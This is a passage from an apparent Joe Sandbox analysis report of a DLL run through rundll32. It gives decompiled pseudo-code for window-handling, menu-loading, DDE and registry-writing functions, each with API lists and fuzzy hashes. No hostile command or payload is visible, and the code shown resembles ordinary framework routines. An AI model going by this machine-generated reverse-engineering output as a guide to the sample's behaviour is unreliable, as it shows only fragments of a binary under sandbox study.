                                                                        						if(_t41 == 0) {
                                                                        							goto L19;
                                                                        						}
                                                                        						DispatchMessageA( &_v32);
                                                                        						goto L18;
                                                                        					}
                                                                        					_push(_v32.wParam);
                                                                        					E1003A098();
                                                                        					goto L19;
                                                                        				}
                                                                        			}





















                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Capture$Message$Dispatch
                                                                        • String ID:
                                                                        • API String ID: 3654672037-0
                                                                        • Opcode ID: e6b58cd4b20e416105edfb9c4440ad9ba75aaff5f0d161abc900f8068c81e4c6
                                                                        • Instruction ID: d9b79505f63fc07e8b5b8f3565facbd5cf555a7e12dc77f8d6b56f2636bb58fe
                                                                        • Opcode Fuzzy Hash: e6b58cd4b20e416105edfb9c4440ad9ba75aaff5f0d161abc900f8068c81e4c6
                                                                        • Instruction Fuzzy Hash: 8431B434A02609AFCB63DBB58C65D6FF6E8EF80787F104419B445DA163CB30A980D762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E1002A1CA(void* __ecx) {
                                                                        				struct HACCEL__* _t25;
                                                                        				void* _t44;
                                                                        				void* _t45;
                                                                        				struct HINSTANCE__* _t46;
                                                                        				struct HINSTANCE__* _t47;
                                                                        				struct HINSTANCE__* _t48;
                                                                        
                                                                        				_t44 = __ecx;
                                                                        				_t40 = __ecx + 0x60;
                                                                        				_t25 =  *(__ecx + 0x60);
                                                                        				_t45 = 0;
                                                                        				if( *((intOrPtr*)(_t25 - 0xc)) == 0) {
                                                                        					_t25 = E10006A60(_t40,  *((intOrPtr*)(__ecx + 0x3c)));
                                                                        				}
                                                                        				if( *(_t44 + 0x44) != _t45 &&  *((intOrPtr*)(_t44 + 0x2c)) == _t45) {
                                                                        					_t48 =  *(E100373B5() + 0xc);
                                                                        					 *((intOrPtr*)(_t44 + 0x2c)) = LoadMenuA(_t48,  *(_t44 + 0x44) & 0x0000ffff);
                                                                        					_t25 = LoadAcceleratorsA(_t48,  *(_t44 + 0x44) & 0x0000ffff);
                                                                        					 *(_t44 + 0x30) = _t25;
                                                                        					_t45 = 0;
                                                                        				}
                                                                        				if( *(_t44 + 0x40) != _t45 &&  *((intOrPtr*)(_t44 + 0x34)) == _t45) {
                                                                        					_t47 =  *(E100373B5() + 0xc);
                                                                        					 *((intOrPtr*)(_t44 + 0x34)) = LoadMenuA(_t47,  *(_t44 + 0x40) & 0x0000ffff);
                                                                        					_t25 = LoadAcceleratorsA(_t47,  *(_t44 + 0x40) & 0x0000ffff);
                                                                        					 *(_t44 + 0x38) = _t25;
                                                                        					_t45 = 0;
                                                                        				}
                                                                        				if( *(_t44 + 0x48) != _t45 &&  *((intOrPtr*)(_t44 + 0x24)) == _t45) {
                                                                        					_t46 =  *(E100373B5() + 0xc);
                                                                        					 *((intOrPtr*)(_t44 + 0x24)) = LoadMenuA(_t46,  *(_t44 + 0x48) & 0x0000ffff);
                                                                        					_t25 = LoadAcceleratorsA(_t46,  *(_t44 + 0x48) & 0x0000ffff);
                                                                        					 *(_t44 + 0x28) = _t25;
                                                                        				}
                                                                        				return _t25;
                                                                        			}










                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Load$AcceleratorsMenu
                                                                        • String ID:
                                                                        • API String ID: 144087665-0
                                                                        • Opcode ID: 62af814d51333b06cd62be60a646d7531518e2420bbbd48c9c7e9b7b2b0652c4
                                                                        • Instruction ID: 79ec512449ce6a4c7bf2710ae8ff5bed15bebc86ac40dbf708adfd4365bfde7a
                                                                        • Opcode Fuzzy Hash: 62af814d51333b06cd62be60a646d7531518e2420bbbd48c9c7e9b7b2b0652c4
                                                                        • Instruction Fuzzy Hash: 8821EA75401B18DFC3B0EF6A9940937F3F8FF09651751446FEA8A86912DA36F890DB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E1002B105(struct HWND__* _a4, struct HWND__** _a8) {
                                                                        				struct HWND__* _t7;
                                                                        				void* _t13;
                                                                        				struct HWND__** _t15;
                                                                        				struct HWND__* _t16;
                                                                        				struct HWND__* _t17;
                                                                        				struct HWND__* _t18;
                                                                        
                                                                        				_t18 = _a4;
                                                                        				_t17 = _t18;
                                                                        				if(_t18 != 0) {
                                                                        					L5:
                                                                        					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
                                                                        						L8:
                                                                        						_t16 = _t17;
                                                                        						_t7 = _t17;
                                                                        						if(_t17 == 0) {
                                                                        							L10:
                                                                        							if(_t18 == 0 && _t17 != 0) {
                                                                        								_t17 = GetLastActivePopup(_t17);
                                                                        							}
                                                                        							_t15 = _a8;
                                                                        							if(_t15 != 0) {
                                                                        								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
                                                                        									 *_t15 =  *_t15 & 0x00000000;
                                                                        								} else {
                                                                        									 *_t15 = _t16;
                                                                        									EnableWindow(_t16, 0);
                                                                        								}
                                                                        							}
                                                                        							return _t17;
                                                                        						} else {
                                                                        							goto L9;
                                                                        						}
                                                                        						do {
                                                                        							L9:
                                                                        							_t16 = _t7;
                                                                        							_t7 = GetParent(_t7);
                                                                        						} while (_t7 != 0);
                                                                        						goto L10;
                                                                        					}
                                                                        					_t17 = GetParent(_t17);
                                                                        					L7:
                                                                        					if(_t17 != 0) {
                                                                        						goto L5;
                                                                        					}
                                                                        					goto L8;
                                                                        				}
                                                                        				_t13 = E1002B0CC();
                                                                        				if(_t13 != 0) {
                                                                        					L4:
                                                                        					_t17 =  *(_t13 + 0x1c);
                                                                        					goto L7;
                                                                        				}
                                                                        				_t13 = E10006C53();
                                                                        				if(_t13 != 0) {
                                                                        					goto L4;
                                                                        				}
                                                                        				_t17 = 0;
                                                                        				goto L8;
                                                                        			}










                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                        • String ID:
                                                                        • API String ID: 670545878-0
                                                                        • Opcode ID: b64e7204216b1f048a42a3b80a98cdaf99d57a40f09b93da801bfd405b8b7097
                                                                        • Instruction ID: ef498eb2053f32fc83163eb1be06eb9c016c70d7a0359ba6d8f1e9348af6cf1d
                                                                        • Opcode Fuzzy Hash: b64e7204216b1f048a42a3b80a98cdaf99d57a40f09b93da801bfd405b8b7097
                                                                        • Instruction Fuzzy Hash: E111A332601F764FD362DA6AACA4B2B77DCDF41BD1FD20159EC04D7211DB60EC104290
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E1002B501(intOrPtr __ecx, CHAR* _a4, char* _a8, char* _a12) {
                                                                        				long _t21;
                                                                        				void* _t28;
                                                                        
                                                                        				if( *((intOrPtr*)(__ecx + 0x50)) == 0) {
                                                                        					return WritePrivateProfileStringA(_a4, _a8, _a12,  *(__ecx + 0x64));
                                                                        				}
                                                                        				if(_a8 != 0) {
                                                                        					_t28 = E10035959(__ecx, _a4);
                                                                        					if(_a12 != 0) {
                                                                        						if(_t28 == 0) {
                                                                        							L3:
                                                                        							return 0;
                                                                        						}
                                                                        						_t21 = RegSetValueExA(_t28, _a8, 0, 1, _a12, lstrlenA(_a12) + 1);
                                                                        						L10:
                                                                        						RegCloseKey(_t28);
                                                                        						return 0 | _t21 == 0x00000000;
                                                                        					}
                                                                        					if(_t28 == 0) {
                                                                        						goto L3;
                                                                        					}
                                                                        					_t21 = RegDeleteValueA(_t28, _a8);
                                                                        					goto L10;
                                                                        				}
                                                                        				_t28 = E100358C8(__ecx);
                                                                        				if(_t28 != 0) {
                                                                        					_t21 = RegDeleteKeyA(_t28, _a4);
                                                                        					goto L10;
                                                                        				}
                                                                        				goto L3;
                                                                        			}






                                                                        APIs
                                                                        • RegDeleteKeyA.ADVAPI32(00000000,?), ref: 1002B525
                                                                        • RegDeleteValueA.ADVAPI32(00000000,00000000,?,00000000), ref: 1002B545
                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,10024C29,?), ref: 1002B570
                                                                          • Part of subcall function 100358C8: RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,00000000,00000000), ref: 100358F6
                                                                          • Part of subcall function 100358C8: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10035919
                                                                          • Part of subcall function 100358C8: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 10035935
                                                                          • Part of subcall function 100358C8: RegCloseKey.ADVAPI32(?), ref: 10035945
                                                                          • Part of subcall function 100358C8: RegCloseKey.ADVAPI32(?), ref: 1003594F
                                                                        • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002B58B
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Close$CreateDelete$OpenPrivateProfileStringValueWrite
                                                                        • String ID:
                                                                        • API String ID: 1886894508-0
                                                                        • Opcode ID: cbf87bc0068c303cc6394e99f804432e3955d1a9386c7571ee80164618b64494
                                                                        • Instruction ID: c8f527a64b8234d0edd8db9930868310c0db2fd70ee1d53d59517915cf010f6f
                                                                        • Opcode Fuzzy Hash: cbf87bc0068c303cc6394e99f804432e3955d1a9386c7571ee80164618b64494
                                                                        • Instruction Fuzzy Hash: D1114832401E79FFDB128F61DC48F9E3BA9EF043A1F814510FD049D061CB328A61AB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 46%
                                                                        			E10031F4A(void* __ebx, void* __ecx, void* __edi, void* __esi, struct HWND__* _a4, intOrPtr _a8) {
                                                                        				intOrPtr _v8;
                                                                        				char _v528;
                                                                        				void* _v532;
                                                                        				char _v536;
                                                                        				intOrPtr _t15;
                                                                        				long _t22;
                                                                        				void* _t25;
                                                                        				void* _t29;
                                                                        
                                                                        				_t15 =  *0x1004c470; // 0x1bfbe703
                                                                        				_v8 = _t15;
                                                                        				_push( &_v532);
                                                                        				_push( &_v536);
                                                                        				_push(_a8);
                                                                        				_push(0x3e8);
                                                                        				_t29 = __ecx;
                                                                        				L1001CA38();
                                                                        				if(lstrlenA(GlobalLock(_v532)) < 0x208) {
                                                                        					_t22 = GlobalUnlock(_v532);
                                                                        					_push(_v532);
                                                                        					_push(0x8000);
                                                                        					_push(0x3e4);
                                                                        					_push(0x3e8);
                                                                        					_push(_a8);
                                                                        					L1001CA32();
                                                                        					PostMessageA(_a4, 0x3e4,  *(_t29 + 0x1c), _t22);
                                                                        					if(E100203CE(_t29) != 0) {
                                                                        						_t25 = E100373B5();
                                                                        						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t25 + 4)))) + 0xa0))( &_v528);
                                                                        					}
                                                                        				}
                                                                        				return E100117AE(0, _v8);
                                                                        			}












                                                                        APIs
                                                                        • UnpackDDElParam.USER32 ref: 10031F76
                                                                        • GlobalLock.KERNEL32 ref: 10031F81
                                                                        • lstrlenA.KERNEL32(00000000), ref: 10031F88
                                                                        • GlobalUnlock.KERNEL32(?), ref: 10031F9C
                                                                        • ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 10031FB7
                                                                        • PostMessageA.USER32 ref: 10031FC4
                                                                          • Part of subcall function 100203CE: IsWindowEnabled.USER32(?), ref: 100203D7
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: GlobalParam$EnabledLockMessagePostReuseUnlockUnpackWindowlstrlen
                                                                        • String ID:
                                                                        • API String ID: 462239228-0
                                                                        • Opcode ID: 9b3d271c77589773dafac36f7ca5bc7fab3ad5ea6926df52b529a664096dacb0
                                                                        • Instruction ID: bfbb9d00b13f65a0ab326070f2ebd1bafe94df8b281a4b7973d805b3987b007f
                                                                        • Opcode Fuzzy Hash: 9b3d271c77589773dafac36f7ca5bc7fab3ad5ea6926df52b529a664096dacb0
                                                                        • Instruction Fuzzy Hash: 8D111C3554121CAFDB12DFA1DC88DDE7BB9FF55351F0045A5F809EA262DA34DE808B60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10029BA4(struct HWND__* _a4) {
                                                                        				struct HWND__* _t3;
                                                                        				struct HWND__* _t6;
                                                                        				struct HWND__* _t11;
                                                                        				struct HWND__* _t14;
                                                                        
                                                                        				_t3 = GetFocus();
                                                                        				_t14 = _t3;
                                                                        				if(_t14 != 0) {
                                                                        					_t11 = _a4;
                                                                        					if(_t14 == _t11) {
                                                                        						L10:
                                                                        						return _t3;
                                                                        					}
                                                                        					if(E10029A8E(_t14, 3) != 0) {
                                                                        						L5:
                                                                        						if(_t11 == 0 || (GetWindowLongA(_t11, 0xfffffff0) & 0x40000000) == 0) {
                                                                        							L8:
                                                                        							_t3 = SendMessageA(_t14, 0x14f, 0, 0);
                                                                        							goto L9;
                                                                        						} else {
                                                                        							_t6 = GetParent(_t11);
                                                                        							_t3 = GetDesktopWindow();
                                                                        							if(_t6 == _t3) {
                                                                        								L9:
                                                                        								goto L10;
                                                                        							}
                                                                        							goto L8;
                                                                        						}
                                                                        					}
                                                                        					_t3 = GetParent(_t14);
                                                                        					_t14 = _t3;
                                                                        					if(_t14 == _t11) {
                                                                        						goto L9;
                                                                        					}
                                                                        					_t3 = E10029A8E(_t14, 2);
                                                                        					if(_t3 == 0) {
                                                                        						goto L9;
                                                                        					}
                                                                        					goto L5;
                                                                        				}
                                                                        				return _t3;
                                                                        			}








                                                                        APIs
                                                                        • GetFocus.USER32 ref: 10029BA5
                                                                          • Part of subcall function 10029A8E: GetWindowLongA.USER32 ref: 10029AA7
                                                                        • GetParent.USER32(00000000), ref: 10029BCE
                                                                          • Part of subcall function 10029A8E: GetClassNameA.USER32(00000000,?,0000000A), ref: 10029AC2
                                                                          • Part of subcall function 10029A8E: lstrcmpiA.KERNEL32(?,combobox), ref: 10029AD1
                                                                        • GetWindowLongA.USER32 ref: 10029BE9
                                                                        • GetParent.USER32(10032120), ref: 10029BF7
                                                                        • GetDesktopWindow.USER32 ref: 10029BFB
                                                                        • SendMessageA.USER32 ref: 10029C0F
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$LongParent$ClassDesktopFocusMessageNameSendlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 2818563221-0
                                                                        • Opcode ID: e89a53c623c721cb0c3fcde6a2588c450b9b76455553080e70e491aeb3ad2bbb
                                                                        • Instruction ID: cea5fa679d97d2953b6d76dc507eb4c5e7da3a0c11b163d723fb81d4da4a6e61
                                                                        • Opcode Fuzzy Hash: e89a53c623c721cb0c3fcde6a2588c450b9b76455553080e70e491aeb3ad2bbb
                                                                        • Instruction Fuzzy Hash: 7FF0A932500A306EE353A62B6D88F5E61D8DF81BD0FB20214F459E6192EB24AC8145A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E10037A96(void* _a4, char* _a8, char* _a12) {
                                                                        				void* _t14;
                                                                        				long _t18;
                                                                        				signed int _t20;
                                                                        				long _t25;
                                                                        
                                                                        				if(_a12 != 0) {
                                                                        					if(RegCreateKeyA(0x80000000, _a4,  &_a4) != 0) {
                                                                        						L6:
                                                                        						_t14 = 0;
                                                                        						L7:
                                                                        						return _t14;
                                                                        					}
                                                                        					_t25 = RegSetValueExA(_a4, _a12, 0, 1, _a8, lstrlenA(_a8) + 1);
                                                                        					_t18 = RegCloseKey(_a4);
                                                                        					if(_t18 != 0 || _t25 != 0) {
                                                                        						goto L6;
                                                                        					} else {
                                                                        						_t14 = _t18 + 1;
                                                                        						goto L7;
                                                                        					}
                                                                        				}
                                                                        				_t20 = RegSetValueA(0x80000000, _a4, 1, _a8, lstrlenA(_a8));
                                                                        				asm("sbb eax, eax");
                                                                        				return  ~_t20 + 1;
                                                                        			}








                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?), ref: 10037AA2
                                                                        • RegSetValueA.ADVAPI32(80000000,?,00000001,?,00000000), ref: 10037AB6
                                                                        • RegCreateKeyA.ADVAPI32(80000000,?,?), ref: 10037AD0
                                                                        • lstrlenA.KERNEL32(?), ref: 10037ADD
                                                                        • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,?,00000001), ref: 10037AF2
                                                                        • RegCloseKey.ADVAPI32(?), ref: 10037AFD
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Valuelstrlen$CloseCreate
                                                                        • String ID:
                                                                        • API String ID: 306239685-0
                                                                        • Opcode ID: 44992d35b15f20819090c12f9012e6152085e8f08d1dc228d24d782121a6f8e9
                                                                        • Instruction ID: 36ac44db30e1571f4bd1a6b15574b4d5f9e82ccdf85d97020e0dea724d6fc6de
                                                                        • Opcode Fuzzy Hash: 44992d35b15f20819090c12f9012e6152085e8f08d1dc228d24d782121a6f8e9
                                                                        • Instruction Fuzzy Hash: 4501043220016DFFEB235FA1DD48F9A7BA9FB08792F108410FE1AD9061D3718A60DB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 90%
                                                                        			E10029C98(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
                                                                        				struct tagRECT _v20;
                                                                        				struct HWND__* _t12;
                                                                        				struct HWND__* _t21;
                                                                        
                                                                        				ClientToScreen(_a4,  &_a8);
                                                                        				_t12 = GetWindow(_a4, 5);
                                                                        				while(1) {
                                                                        					_t21 = _t12;
                                                                        					if(_t21 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
                                                                        						GetWindowRect(_t21,  &_v20);
                                                                        						_push(_a12);
                                                                        						if(PtInRect( &_v20, _a8) != 0) {
                                                                        							return _t21;
                                                                        						}
                                                                        					}
                                                                        					_t12 = GetWindow(_t21, 2);
                                                                        				}
                                                                        				return _t12;
                                                                        			}







                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Rect$ClientCtrlLongScreen
                                                                        • String ID:
                                                                        • API String ID: 1315500227-0
                                                                        • Opcode ID: 3db020920b72c671971993ae9780b3d492816d86ba5cd9127ef1e8eba5203929
                                                                        • Instruction ID: 9b9f6f1c131c314e5c19284c1e668e0a3a9e33f7fca6b6c160f9dd0f3207debf
                                                                        • Opcode Fuzzy Hash: 3db020920b72c671971993ae9780b3d492816d86ba5cd9127ef1e8eba5203929
                                                                        • Instruction Fuzzy Hash: 7A01623650056ABFDB129F569C48EEE37ADEF017D0F514115FD11EA161D730DA01DB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10022233(intOrPtr* __ecx) {
                                                                        				struct HWND__* _v40;
                                                                        				struct HWND__* _v44;
                                                                        				intOrPtr _v48;
                                                                        				void* _v52;
                                                                        				long _t34;
                                                                        				long _t43;
                                                                        				struct HWND__* _t48;
                                                                        				intOrPtr* _t63;
                                                                        				signed int _t64;
                                                                        				void* _t69;
                                                                        				intOrPtr _t71;
                                                                        				intOrPtr* _t72;
                                                                        
                                                                        				_t72 = __ecx;
                                                                        				_t69 = E1001F7AE();
                                                                        				if(_t69 != 0) {
                                                                        					if( *((intOrPtr*)(_t69 + 0x1c)) == __ecx) {
                                                                        						 *((intOrPtr*)(_t69 + 0x1c)) = 0;
                                                                        					}
                                                                        					if( *((intOrPtr*)(_t69 + 0x20)) == _t72) {
                                                                        						 *((intOrPtr*)(_t69 + 0x20)) = 0;
                                                                        					}
                                                                        				}
                                                                        				_t63 =  *((intOrPtr*)(_t72 + 0x44));
                                                                        				if(_t63 != 0) {
                                                                        					 *((intOrPtr*)( *_t63 + 0x50))();
                                                                        					 *((intOrPtr*)(_t72 + 0x44)) = 0;
                                                                        				}
                                                                        				_t64 =  *(_t72 + 0x48);
                                                                        				if(_t64 != 0) {
                                                                        					 *((intOrPtr*)( *_t64 + 4))(1);
                                                                        				}
                                                                        				 *(_t72 + 0x48) =  *(_t72 + 0x48) & 0x00000000;
                                                                        				if(( *(_t72 + 0x38) & 1) != 0) {
                                                                        					_t71 =  *((intOrPtr*)(E100373DB() + 0x3c));
                                                                        					if(_t71 != 0 &&  *(_t71 + 0x1c) != 0) {
                                                                        						E10011C50( &_v52, 0, 0x30);
                                                                        						_t48 =  *(_t72 + 0x1c);
                                                                        						_v44 = _t48;
                                                                        						_v40 = _t48;
                                                                        						_v52 = 0x28;
                                                                        						_v48 = 1;
                                                                        						SendMessageA( *(_t71 + 0x1c), 0x405, 0,  &_v52);
                                                                        					}
                                                                        				}
                                                                        				_t34 = GetWindowLongA( *(_t72 + 0x1c), 0xfffffffc);
                                                                        				E1002204B(_t72);
                                                                        				if(GetWindowLongA( *(_t72 + 0x1c), 0xfffffffc) == _t34) {
                                                                        					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
                                                                        					if(_t43 != 0) {
                                                                        						SetWindowLongA( *(_t72 + 0x1c), 0xfffffffc, _t43);
                                                                        					}
                                                                        				}
                                                                        				E10022168(_t72);
                                                                        				return  *((intOrPtr*)( *_t72 + 0x114))();
                                                                        			}
















                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: LongWindow$MessageSend
                                                                        • String ID: (
                                                                        • API String ID: 2178440468-3887548279
                                                                        • Opcode ID: a0256d8b5034a2fee01dc273fb99e3b5b93d09b5292866429bde14ed636a8408
                                                                        • Instruction ID: 74d92888995a03eb436cf4db0a6f1431d092ba1e50ceac8416b65ae125f9645e
                                                                        • Opcode Fuzzy Hash: a0256d8b5034a2fee01dc273fb99e3b5b93d09b5292866429bde14ed636a8408
                                                                        • Instruction Fuzzy Hash: 0C31AD34600615FFCB21DFA9E884A6EB7F8FF04250F52062DE5429B692CB31F848CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10032286(intOrPtr* __ecx, int _a4, signed int _a8, intOrPtr _a12) {
                                                                        				void* __ebp;
                                                                        				void* _t29;
                                                                        				int _t30;
                                                                        				void* _t35;
                                                                        				void* _t38;
                                                                        				intOrPtr* _t40;
                                                                        				int _t42;
                                                                        				intOrPtr* _t45;
                                                                        				void* _t46;
                                                                        
                                                                        				_t45 = __ecx;
                                                                        				_t29 = E10022AD5(__ecx);
                                                                        				_t40 =  *((intOrPtr*)(_t45 + 0x7c));
                                                                        				_t42 = _a4;
                                                                        				_t38 = _t29;
                                                                        				if(_t40 == 0) {
                                                                        					L2:
                                                                        					if(_a8 != 0xffff) {
                                                                        						if(_t42 == 0 || (_a8 & 0x00000810) != 0) {
                                                                        							 *(_t45 + 0xa4) =  *(_t45 + 0xa4) & 0x00000000;
                                                                        							goto L17;
                                                                        						} else {
                                                                        							if(_t42 < 0xf000 || _t42 >= 0xf1f0) {
